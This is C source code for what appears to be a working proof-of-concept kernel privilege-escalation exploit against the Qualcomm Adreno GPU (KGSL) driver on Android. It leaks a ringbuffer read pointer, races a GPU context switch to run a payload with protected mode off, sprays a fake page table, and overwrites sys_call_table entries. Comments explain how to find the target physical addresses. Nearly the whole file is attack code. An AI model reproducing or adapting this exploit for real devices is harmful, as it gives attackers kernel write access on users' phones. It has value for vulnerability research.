#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "adrenaline.h" #define PAGE_SIZE 0x1000 #define NPBUFS 64 #define LEVEL1_SHIFT 30 #define LEVEL1_MASK (0x1ff << LEVEL1_SHIFT) #define LEVEL2_SHIFT 21 #define LEVEL2_MASK (0x1ff << LEVEL2_SHIFT) #define LEVEL3_SHIFT 12 #define LEVEL3_MASK (0x1ff << LEVEL3_SHIFT) #define ENTRY_VALID 3 #define ENTRY_RW (1 << 6) /* Normal Non-Cacheable memory */ #define ENTRY_MEMTYPE_NNC (3 << 2) /* "outer attributes are exported from the processor to the external memory bus * and are therefore potentially used by cache hardware external to the core or * cluster" */ #define ENTRY_OUTER_SHARE (2 << 8) /* Active */ #define ENTRY_AF (1<<10) /* Non-Global */ #define ENTRY_NG (1<<11) char retbuf[256]; // func from 2019-2215 poc p0 // example usage // static char page_buffer[0x1000]; //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer)); void hexdump_memory(unsigned char *buf, size_t byte_count) { unsigned long byte_offset_start = 0; if (byte_count % 16) // errx(1, "hexdump_memory called with non-full line"); for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count; byte_offset += 16) { char line[1000]; char *linep = line; linep += sprintf(linep, "%08lx ", byte_offset); for (int i=0; i<16; i++) { linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]); } linep += sprintf(linep, " |"); for (int i=0; i<16; i++) { char c = buf[byte_offset + i]; if (isalnum(c) || ispunct(c) || c == ' ') { *(linep++) = c; } else { *(linep++) = '.'; } } linep += sprintf(linep, "|"); puts(line); } } int setup_pagetables(uint8_t *tt0, uint32_t pages, uint32_t tt0phys, uint64_t fake_gpuaddr, uint64_t target_pa) { uint64_t *level_base; uint64_t level1_index, level2_index, level3_index; int i; for (i = 0; i < pages; i++) { level_base = (uint64_t *) (tt0 + (i * PAGE_SIZE)); 
memset(level_base, 0x45, 4096); level1_index = (fake_gpuaddr & LEVEL1_MASK) >> LEVEL1_SHIFT; level2_index = (fake_gpuaddr & LEVEL2_MASK) >> LEVEL2_SHIFT; level3_index = (fake_gpuaddr & LEVEL3_MASK) >> LEVEL3_SHIFT; if (level1_index == level2_index || level1_index == level3_index || level2_index == level3_index) { return -1; } level_base[level1_index] = (uint64_t) tt0phys | ENTRY_VALID; level_base[level2_index] = (uint64_t) tt0phys | ENTRY_VALID; level_base[level3_index] = (uint64_t) (target_pa | ENTRY_VALID | ENTRY_RW | ENTRY_MEMTYPE_NNC | ENTRY_OUTER_SHARE | ENTRY_AF | ENTRY_NG); } return 0; } /* modified version of kilroy's kgsl_ctx_create. create a KGSL context that will use * ringbuffer 0, and make sure KGSL_CONTEXT_USER_GENERATED_TS is disabled */ int kgsl_ctx_create0(int fd, uint32_t *ctx_id) { struct kgsl_drawctxt_create req = { .flags = 0x00001812, // low prio, rb 0 }; int ret; ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req); if (ret) return ret; *ctx_id = req.drawctxt_id; return 0; } /* cleanup an existing GPU context */ int kgsl_ctx_destroy(int fd, uint32_t ctx_id) { struct kgsl_drawctxt_destroy req = { .drawctxt_id = ctx_id, }; return ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &req); } /* modified version of kilroy's kgsl_map. the choice to use KGSL_MEMFLAGS_USE_CPU_MAP * comes from earlier debugging efforts, but a normal user mapping should work as well, * it would just need to use uint64_t and drop the flags. 
*/ int kgsl_map(int fd, unsigned long addr, size_t len, uint32_t *gpuaddr) { struct kgsl_map_user_mem req = { .len = len, .offset = 0, .hostptr = addr, .memtype = KGSL_USER_MEM_TYPE_ADDR, .flags = KGSL_MEMFLAGS_USE_CPU_MAP, }; int ret; ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req); if (ret) return ret; *gpuaddr = req.gpuaddr; return 0; } /* similar to kgsl_gpu_command_n, but specifically starts with a wait command IB before the * variable length repeated IB */ int kgsl_gpu_command_align(int fd, uint32_t ctx_id, uint32_t wait_gpuaddr, uint32_t wait_cmdsize, uint32_t nop_gpuaddr, uint32_t nop_cmdsize, uint32_t n) { struct kgsl_command_object *cmds; struct kgsl_gpu_command req = { .context_id = ctx_id, .cmdsize = sizeof(struct kgsl_command_object), .numcmds = n, }; size_t cmds_size; uint32_t i; cmds_size = n * sizeof(struct kgsl_command_object); cmds = (struct kgsl_command_object *) malloc(cmds_size); if (cmds == NULL) { return -1; } memset(cmds, 0, cmds_size); cmds[0].flags = KGSL_CMDLIST_IB; cmds[0].gpuaddr = wait_gpuaddr; cmds[0].size = wait_cmdsize; for (i = 1; i < n; i++) { cmds[i].flags = KGSL_CMDLIST_IB; cmds[i].gpuaddr = nop_gpuaddr; cmds[i].size = nop_cmdsize; } req.cmdlist = (unsigned long) cmds; return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); } /* send a variable number of repeated IBs to the GPU. 
*/ int kgsl_gpu_command_n(int fd, uint32_t ctx_id, uint32_t gpuaddr, uint32_t cmdsize, uint32_t n) { struct kgsl_command_object *cmds; struct kgsl_gpu_command req = { .cmdsize = sizeof(struct kgsl_command_object), .numcmds = n, .context_id = ctx_id, }; size_t cmds_size; uint32_t i; cmds_size = n * sizeof(struct kgsl_command_object); cmds = (struct kgsl_command_object *) malloc(cmds_size); if (cmds == NULL) { return -1; } memset(cmds, 0, cmds_size); for (i = 0; i < n; i++) { cmds[i].flags = KGSL_CMDLIST_IB; cmds[i].gpuaddr = gpuaddr; cmds[i].size = cmdsize; } req.cmdlist = (unsigned long) cmds; return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); } /* send pad IBs and a payload IB at a specific index to the GPU. the index is chosen to win * the race condition with the targeted context switch */ int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint32_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) { struct kgsl_command_object *cmds; struct kgsl_gpu_command req = { .context_id = ctx_id, .cmdsize = sizeof(struct kgsl_command_object), .numcmds = n, }; size_t cmds_size; uint32_t i; cmds_size = n * sizeof(struct kgsl_command_object); cmds = (struct kgsl_command_object *) malloc(cmds_size); if (cmds == NULL) { return -1; } memset(cmds, 0, cmds_size); for (i = 0; i < n; i++) { cmds[i].flags = KGSL_CMDLIST_IB; if (i == target_idx) { cmds[i].gpuaddr = target_cmd; cmds[i].size = target_size; } else { /* the shift here is helpful for debugging failed alignment */ cmds[i].gpuaddr = gpuaddr + (i << 16); cmds[i].size = cmdsize; } } req.cmdlist = (unsigned long) cmds; return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req); } void adrenaline_child(int read_pipe, int write_pipe) { int fd, ret; uint32_t map_addr = 0x4000a000; uint32_t *cs_buf, *cs_cmds; uint32_t cs_cmds_size; uint32_t cs_gpuaddr; uint32_t ctx_id; uint32_t sync; struct pollfd pfd; printf("[*] child: starting adrenaline_child\n"); fd = open("/dev/kgsl-3d0", O_RDWR); if 
(fd == -1) {
    return;
  }

  /* fixed CPU-side buffer for the child's command stream; mapped onto the GPU below */
  cs_buf = (uint32_t *) mmap((void *) map_addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED|MAP_LOCKED, -1, 0);
  if (cs_buf == MAP_FAILED) {
    return;
  }

  ret = kgsl_map(fd, (unsigned long) cs_buf, 4096, &cs_gpuaddr);
  if (ret == -1) {
    return;
  }

  ret = kgsl_ctx_create0(fd, &ctx_id);
  if (ret) {
    return;
  }

  cs_cmds = cs_buf;

  /* if executed this will show up as a invalid opcode GPU fault in dmesg, which is the
   * indication that we lost the race condition. if the parent wins the race condition, this
   * will never be executed */

  /* CP switches the pagetable (context switch) */
  // *cs_cmds++ = cp_type4_packet(CP_SMMU_TABLE_UPDATE, 3);
  // cs_cmds+= cp_gpuaddr(cs_cmds, cs_gpuaddr);
  *cs_cmds++ = 0x21212121;
  *cs_cmds++ = cp_type7_packet(CP_SMMU_TABLE_UPDATE, 3);
  cs_cmds += cp_gpuaddr(cs_cmds, cs_gpuaddr);

  cs_cmds_size = (cs_cmds - cs_buf) * 4;

  pfd.fd = read_pipe;
  pfd.events = POLLIN;
  pfd.revents = 0;

  /* block until the parent signals that the ringbuffer has been staged */
  if (poll(&pfd, 1, -1) == -1) {
    exit(-1);
  }

  printf("[*] child: recieve 6 from pipe buff, and kick off a GPU context switch\n");
  read(read_pipe, &sync, sizeof(uint32_t));
  if (sync != 0x66666666) {
    return;
  }

  printf("[*] child: run GPU context switch\n");
  ret = kgsl_gpu_command_n(fd, ctx_id, cs_gpuaddr, cs_cmds_size, 1);
  if (ret == -1) {
    return;
  }

  printf("[*] child: let the parent process know that the context switch has been dispatched\n");
  /* let the parent process know that the context switch has been dispatched */
  sync = 0x77777777;
  write(write_pipe, &sync, sizeof(uint32_t));

  usleep(200000);

  ret = kgsl_ctx_destroy(fd, ctx_id);
  if (ret == -1) {
    return;
  }

  ret = munmap(cs_buf, 4096);
  if (ret == -1) {
    return;
  }

  close(fd);
  return;
}

/* parent side of the race: stages the ringbuffer layout, corrupts the scratch
 * buffer rptr, and overwrites the child's in-flight context switch with the
 * payload IB. returns a status string: either a literal on early failure or
 * the shared retbuf scratch buffer. */
char *adrenaline_parent(int read_pipe, int write_pipe, uint32_t rptr_base)
{
  int fd, ret, i;
  struct pollfd pfd;
  uint32_t map_addr = 0x40000000;
  uint32_t *wait_cmds, wait_cmds_size;
  uint32_t *wait_cmd_buf, wait_cmd_gpuaddr;
  uint32_t *data_buf, data_gpuaddr;
  uint32_t *nop_cmds, nop_cmds_size;
  uint32_t *nop_buf,
nop_cmd_gpuaddr;
  uint32_t *payload_cmds, payload_cmds_size;
  uint32_t *payload_buf, payload_cmd_gpuaddr;
  uint32_t ctx_id, sync;
  uint32_t pbuf_len;
  uint8_t *pbufs[NPBUFS], *pbuf;
  uint64_t phyaddr;
  int j;

  printf("[*] parent: starting adrenaline_parent\n");

  fd = open("/dev/kgsl-3d0", O_RDWR);
  if (fd == -1) {
    return "error opening kgsl-3d0";
  }

  /* four fixed-address pages, each mapped onto the GPU: the wait IB, a data
   * page the wait commands poll on, a NOP IB, and the payload IB */
  wait_cmd_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (wait_cmd_buf == MAP_FAILED) {
    return "mmap failed (wait_cmd_buf)";
  }

  ret = kgsl_map(fd, (unsigned long) wait_cmd_buf, PAGE_SIZE, &wait_cmd_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (wait_cmd_buf)";
  }

  map_addr += PAGE_SIZE;

  data_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (data_buf == MAP_FAILED) {
    return "mmap failed (data_buf)";
  }

  ret = kgsl_map(fd, (unsigned long) data_buf, PAGE_SIZE, &data_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (data_buf)";
  }

  map_addr += PAGE_SIZE;

  nop_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (nop_buf == MAP_FAILED) {
    return "mmap failed (nop_buf)";
  }

  ret = kgsl_map(fd, (unsigned long) nop_buf, PAGE_SIZE, &nop_cmd_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (nop_buf)";
  }

  map_addr += PAGE_SIZE;

  payload_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED|MAP_LOCKED, -1, 0);
  if (payload_buf == MAP_FAILED) {
    return "mmap failed (payload_buf)";
  }

  ret = kgsl_map(fd, (unsigned long) payload_buf, PAGE_SIZE, &payload_cmd_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (payload_buf)";
  }

  /* we use ringbuffer 0 because it seems to be unused, so we don't have any contention
   * and the offsets are stable */
  ret = kgsl_ctx_create0(fd, &ctx_id);
  if (ret) {
    snprintf(retbuf, 255, "kgsl_ctx_create0 failed");
    return retbuf;
  }

  /* this is the physical address of the fake page table that we will point the SMMU TTBR0 to.
   *
   * it's chosen more or less at random based on results of performing a similar spray and then
   * checking commonly recurring entries in /proc/self/pagemap */
  phyaddr = 0xfebeb000;

  /* spray 16mb per mapping */
  pbuf_len = PAGE_SIZE * 4096;

  /* this loop is spraying a fake page table so that it hopefully lands at a fixed physical
   * address. one way that the exploit can fail is if this page has already been allocated,
   * in which case a reboot might be necessary */
  for (i = 0; i < NPBUFS; i++) {
    /* NOTE(review): MAP_ANONYMOUS mappings should pass fd -1 for portability;
     * Linux ignores the 0 used here — confirm */
    pbuf = (uint8_t *) mmap(NULL, pbuf_len, PROT_READ | PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (pbuf == (uint8_t *) MAP_FAILED) {
      snprintf(retbuf, 255, "pbuf mmap failed (%d)", i);
      return retbuf;
    }

    /* our fake gpuaddress (0x40403000) is chosen to allow level1/2/3 to be at different
     * offsets within the same page (e.g. level 1 = 0x1, level2 = 0x3, level3 = 0x3).
     *
     * the target physical page (0x821D9000) corresponds to sys_call_table, which is at
     * a fixed physical address that you can calculate by taking the base of "Kernel Code"
     * from /proc/iomem and then adding (sys_call_table - _text) from /proc/kallsyms */
    ret = setup_pagetables(pbuf, pbuf_len/4096, phyaddr, 0x40403000, 0x821a5000);
    if (ret == -1) {
      snprintf(retbuf, 255, "setup_pagetables failed");
      return retbuf;
    }

    pbufs[i] = pbuf;
  }

  /* setting up out wait commands. first stage (0x41414141) waits for the ringbuffer to be
   * layed out correctly, then the scratch buffer rptr is corrupted, and finally the second
   * stage (0x42424242) waits for the ringbuffer corruption to start.
   *
   * the return from this IB will be followed by a context switch, which will be corrupted
   * mid-execution (e.g. while protected mode is disabled).
   */
  wait_cmds = wait_cmd_buf;

  /* stage 1 wait */
  *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
  *wait_cmds++ = 0x13;
  wait_cmds += cp_gpuaddr(wait_cmds, data_gpuaddr);
  *wait_cmds++ = 0x41414141;
  *wait_cmds++ = 0xffffffff;
  *wait_cmds++ = 0x1;

  /* corrupt scratch rptr for ringbuffer 0 */
  *wait_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
  wait_cmds += cp_gpuaddr(wait_cmds, rptr_base);
  *wait_cmds++ = 0x1ffc;

  /* ensure that the write has taken effect */
  *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
  *wait_cmds++ = 0x13;
  wait_cmds += cp_gpuaddr(wait_cmds, rptr_base);
  *wait_cmds++ = 0x1ffc;
  *wait_cmds++ = 0xffffffff;
  *wait_cmds++ = 0x1;

  /* stage 2 wait */
  *wait_cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
  *wait_cmds++ = 0x13;
  wait_cmds += cp_gpuaddr(wait_cmds, data_gpuaddr+4);
  *wait_cmds++ = 0x42424242;
  *wait_cmds++ = 0xffffffff;
  *wait_cmds++ = 0x1;

  wait_cmds_size = (wait_cmds - wait_cmd_buf) * 4;

  /* multi-purpose NOP buffer, mostly used for getting the layout of the ringbuffer correct */
  nop_cmds = nop_buf;
  *nop_cmds++ = cp_type7_packet(CP_NOP, 1);
  *nop_cmds++ = cp_type7_packet(CP_NOP, 0);

  nop_cmds_size = (nop_cmds - nop_buf) * 4;

  /* payload IB. this runs with protected mode disabled (and apriv enabled) */
  payload_cmds = payload_buf;
  *payload_cmds++ = cp_type7_packet(CP_NOP, 1);
  *payload_cmds++ = 0xffffffff;

  /* borrowed from driver code for "stabler synchroinzation" */
  payload_cmds += _adreno_iommu_add_idle_indirect_cmds(payload_cmds);
  payload_cmds += cp_wait_for_idle(payload_cmds);
  payload_cmds += cp_wait_for_me(payload_cmds);

  /* write fake page table to TTBR0 register */
  *payload_cmds++ = cp_register(0x12008, 2);
  *payload_cmds++ = phyaddr;
  *payload_cmds++ = 0x00400000;

  /* following the driver's actions after page table changes */
  payload_cmds += cp_wait_for_me(payload_cmds);
  payload_cmds += cp_wait_for_idle(payload_cmds);
  payload_cmds += cp_invalidate_state(payload_cmds);

  /* overwrite fork()'s syscall table entry for some hasty fireworks */
  *payload_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
  payload_cmds += cp_gpuaddr(payload_cmds, 0x40403000+16);
  *payload_cmds++ = 0x13371337;
  *payload_cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
  payload_cmds += cp_gpuaddr(payload_cmds, 0x40403000+20);
  *payload_cmds++ = 0x13371337;

  payload_cmds_size = (payload_cmds - payload_buf) * 4;

  usleep(50000);

  /* first we pad the ringbuffer to get our wait IB roughly in the middle */
  ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 868);
  if (ret == -1) {
    snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  printf("[*] parent: kick off the wait command, and follow it with the correct amount of alignment nops\n");
  /* kick off the wait command, and follow it with the correct amount of alignment nops.
   * the purpose of the alignment nops is to get the child's context switch in the right place
   * for the race condition one guess would be that this is to get aligned to a boundary based
   * on cache line width or an internal prefetch buffer size, since it seems to be stable */
  ret = kgsl_gpu_command_align(fd, ctx_id, wait_cmd_gpuaddr, wait_cmds_size,
      nop_cmd_gpuaddr, nop_cmds_size, 36);
  if (ret == -1) {
    snprintf(retbuf, 255, "wait_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  printf("[*] parent: send a message to our child process, which will kick off a GPU context switch\n");
  /* send a message to our child process, which will kick off a GPU context switch */
  sync = 0x66666666;
  write(write_pipe, &sync, sizeof(uint32_t));

  pfd.fd = read_pipe;
  pfd.events = POLLIN;
  pfd.revents = 0;

  printf("[*] parent: wait for confirmation that the context switch is in before proceeding \n");
  /* wait for confirmation that the context switch is in before proceeding */
  if (poll(&pfd, 1, 4) <= 0) {
    snprintf(retbuf, 255, "poll error or timeout");
    return retbuf;
  }

  read(read_pipe, &sync, sizeof(uint32_t));
  if (sync != 0x77777777) {
    snprintf(retbuf, 255, "unexpected sync result %x", sync);
    return retbuf;
  }

  printf("[*] parent: fill up the rest of ringbuffer 0 \n");
  /* fill up the rest of ringbuffer 0 so that subsequent GPU commands will start at the
   * beginning of the ringbuffer. */
  ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 888);
  if (ret == -1) {
    snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  usleep(20000);

  /* the next two GPU commands are inert, but are used to get correct alignment for the
   * race condition. without this we likely end up in the middle of an IB command, which
   * would result in a fault */
  ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 100);
  if (ret == -1) {
    snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  ret = kgsl_gpu_command_n(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size, 1);
  if (ret == -1) {
    snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  printf("[*] parent: signal the wait command to progress to scratch buffer rptr corruption \n");
  /* at this point the ringbuffer layout is complete, and we can signal the wait command
   * to progress to scratch buffer rptr corruption */
  *data_buf = 0x41414141;
  __builtin___clear_cache((char *) data_buf, (char *) data_buf+4096);

  // hexdump scratch buffer rptr corrupt
  printf("[*] parent: scratch buffer rptr corrupt with AAAA\n");
  /* NOTE(review): sizeof(data_buf+4096) is the size of a pointer (8 bytes),
   * not 4096 — this dumps far less than the comment suggests; confirm the
   * intended length */
  hexdump_memory((unsigned char *)data_buf, sizeof(data_buf+4096));

  /* by the time this GPU command is dispatched, the scratch rptr will be invalid, which means
   * this will overwrite the existing ringbuffer contents (wait command, alignment NOPs,
   * and then the context switch) */
  ret = kgsl_gpu_command_payload(fd, ctx_id, nop_cmd_gpuaddr, nop_cmds_size,
      0x376, 0x374, payload_cmd_gpuaddr, payload_cmds_size);
  if (ret == -1) {
    snprintf(retbuf, 255, "nop_cmd kgsl_gpu_command failed errno %d", errno);
    return retbuf;
  }

  usleep(50000);

  /* finish stage 2 of the wait command. the GPU will then execute the alignment NOPs and
   * start executing the context switch. before the context switch finishes the payload GPU
   * command will be written and executed */
  *(data_buf+1) = 0x42424242;
  __builtin___clear_cache((char *) data_buf, (char *) data_buf+4096);

  // hexdump exploit payload buffer
  printf("[*] parent: exploit payload buffer\n");
  hexdump_memory((unsigned char *)data_buf, sizeof(data_buf+4096));

  usleep(50000);

  /* NOTE(review): "%p" is given a uint32_t here, not a pointer — format and
   * argument types mismatch; confirm */
  snprintf(retbuf, 255, "adrenaline race lost: context id: (%d), rptr_base: (%p) -- try again",
      ctx_id, rptr_base);
  return retbuf;
}

/* fork the child/parent pair and run the race; returns a heap-allocated copy
 * of the parent's status string */
char* adrenaline(uint32_t rptr_base)
{
  int parent_pipefd[2];
  int child_pipefd[2];
  pid_t p;
  char *retp;
  int i;

  printf("[*] adrenaline: starting adrenaline\n");

  pipe(parent_pipefd);
  pipe(child_pipefd);

  p = fork();

  /* the child process is used primarily to generate the ringbuffer context switch commands
   * that we will race against with the parent process. most of the work happens in the parent */
  if (p == 0) {
    adrenaline_child(child_pipefd[0], parent_pipefd[1]);
    exit(0);
  } else {
    retp = adrenaline_parent(parent_pipefd[0], child_pipefd[1], rptr_base);
  }

  return strdup(retp);
}

/* leak the scratch-buffer rptr base by reading back ringbuffer 0 contents with
 * a CP_MEM_TO_MEM copy into a CPU-visible page; the page-aligned result is
 * written to write_pipe */
char* adrenaline_rptr_child(int read_pipe, int write_pipe)
{
  int fd, ret;
  uint32_t ctx_id;
  uint32_t *cmds, cmds_size;
  uint32_t cmd_gpuaddr, data_gpuaddr;
  uint32_t *cmd_buf, *data_buf;
  uint32_t map_addr = 0x50005000;
  uint32_t rptr_base;

  printf("[*] rptr_child: starting adrenaline_rptr_child\n");

  fd = open("/dev/kgsl-3d0", O_RDWR);
  if (fd == -1) {
    return "Error opening kgsl-3d0";
  }

  cmd_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (cmd_buf == MAP_FAILED) {
    return "mmap failed (cmd_buf)";
  }

  ret = kgsl_map(fd, (unsigned long) cmd_buf, PAGE_SIZE, &cmd_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (cmd_buf)";
  }

  map_addr += PAGE_SIZE;

  data_buf = (uint32_t *) mmap((void *) map_addr, PAGE_SIZE, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if (data_buf == MAP_FAILED) {
    return "mmap failed (wait_buf)";
  }

  ret = kgsl_map(fd, (unsigned
long) data_buf, PAGE_SIZE, &data_gpuaddr);
  if (ret == -1) {
    return "kgsl_map failed (wait_buf)";
  }

  ret = kgsl_ctx_create0(fd, &ctx_id);
  if (ret) {
    return "kgsl_ctx_create0 failed";
  }

  cmds = cmd_buf;

  /* the constant value 0xfc04b318 is a GPU address that refers to the contents of
   * ringbuffer 0. this specific offset is not guaranteed to work on all kernels, as the
   * contents of the ringbuffer may change across versions. specifically we're reading out
   * the argument to the CP_MEM_WRITE in a6xx_preemption_pre_ibsubmit, which uses the
   * scratch buffer as a destination argument. */
  *cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
  *cmds++ = 0;
  cmds += cp_gpuaddr(cmds, data_gpuaddr);
  cmds += cp_gpuaddr(cmds, 0xfc04b318);

  cmds_size = (cmds - cmd_buf) * 4;

  usleep(50000);

  ret = kgsl_gpu_command_n(fd, ctx_id, cmd_gpuaddr, cmds_size, 1);
  if (ret == -1) {
    snprintf(retbuf, 255, "kgsl_gpu_command failed errno %d", errno);
    return strdup(retbuf);
  }

  usleep(50000);

  /* page-align the value the GPU copied back for us */
  rptr_base = *(data_buf) & (~0xFFF);

  write(write_pipe, &rptr_base, sizeof(uint32_t));

  // hexdump ringbuffer to seee rptr
  printf("[*] dump ringbuffer\n");
  /* NOTE(review): this casts the 32-bit GPU address to a CPU pointer and passes
   * sizeof(rptr_base) == 4 as the length; the address is almost certainly not a
   * valid CPU mapping — debug-only code, confirm intent */
  hexdump_memory((unsigned char *)rptr_base, sizeof(rptr_base));

  usleep(200000);

  ret = munmap(cmd_buf, 4096);
  if (ret == -1) {
    return "munmap failed (cmd_buf)";
  }

  ret = munmap(data_buf, 4096);
  if (ret == -1) {
    return "munmap failed (wait_buf)";
  }

  ret = kgsl_ctx_destroy(fd, ctx_id);
  if (ret == -1) {
    return "kgsl_ctx_destroy failed errno";
  }

  close(fd);

  snprintf(retbuf, 255, "%x", rptr_base);
  return strdup(retbuf);
}

/* run the rptr leak in a forked child and receive the result over a pipe;
 * returns the page-aligned scratch buffer base, or (uint32_t)-1 on poll failure */
uint32_t adrenaline_rptr(void)
{
  struct pollfd pfd;
  int parent_pipefd[2];
  int child_pipefd[2];
  pid_t p;
  uint32_t rptr_base;

  pipe(parent_pipefd);
  pipe(child_pipefd);

  p = fork();
  if (p == 0) {
    /* perform the rptr leak in a child process in order to keep our current process
     * in a clean state in terms of GPU mappings -- not strictly necessary though.
     * returns an unused string that was previously used for debugging purposes, and
     * the base of the scratch buffer is sent over a pipe to the parent instead. */
    adrenaline_rptr_child(child_pipefd[0], parent_pipefd[1]);
    exit(0);
  }

  pfd.fd = parent_pipefd[0];
  pfd.events = POLLIN;
  pfd.revents = 0;

  if (poll(&pfd, 1, -1) <= 0) {
    return -1;
  }

  read(parent_pipefd[0], &rptr_base, sizeof(uint32_t));
  return rptr_base;
}

/* entry point: with no argument, leak the rptr base first; with one argument,
 * parse it as a hex rptr base; then run the race */
int main(int argc, char** argv)
{
  uint32_t rptr_base = -1;
  char *strtoul_ptr;
  char *adrenaline_str;

  if (argc < 2) {
    printf("Usage: %s \n", argv[0]);
    printf("No arg will run leak_rptr\n");

    // perform the rptr leak
    rptr_base = adrenaline_rptr();
    if (rptr_base == -1) {
      printf("adrenaline_rptr failed");
    } else if (rptr_base < 0xFC000000 || rptr_base >= 0xFD400000) {
      return printf("adrenaline_rptr: %p is out of global mapping range\n", rptr_base);
    }
  } else if(argc > 2) {
    printf("Too many arguments supplied.\n");
  } else {
    // set rptr as input
    rptr_base = strtoul((argv[1]), &strtoul_ptr, 16);
    printf("[*] main: rptr is passed as %p\n", rptr_base);
  }

  /* NOTE(review): the "%p" conversions in this function receive a uint32_t,
   * not a pointer — format/argument mismatch (UB per C11); confirm and
   * consider "%x" */
  printf("[*] main: rptr base is %p\n", rptr_base);

  // start race condition to context switch,
  // write to gpu, and gain kernel code exec
  adrenaline_str = adrenaline(rptr_base);
  printf("%s\n", adrenaline_str);

  return 0;
}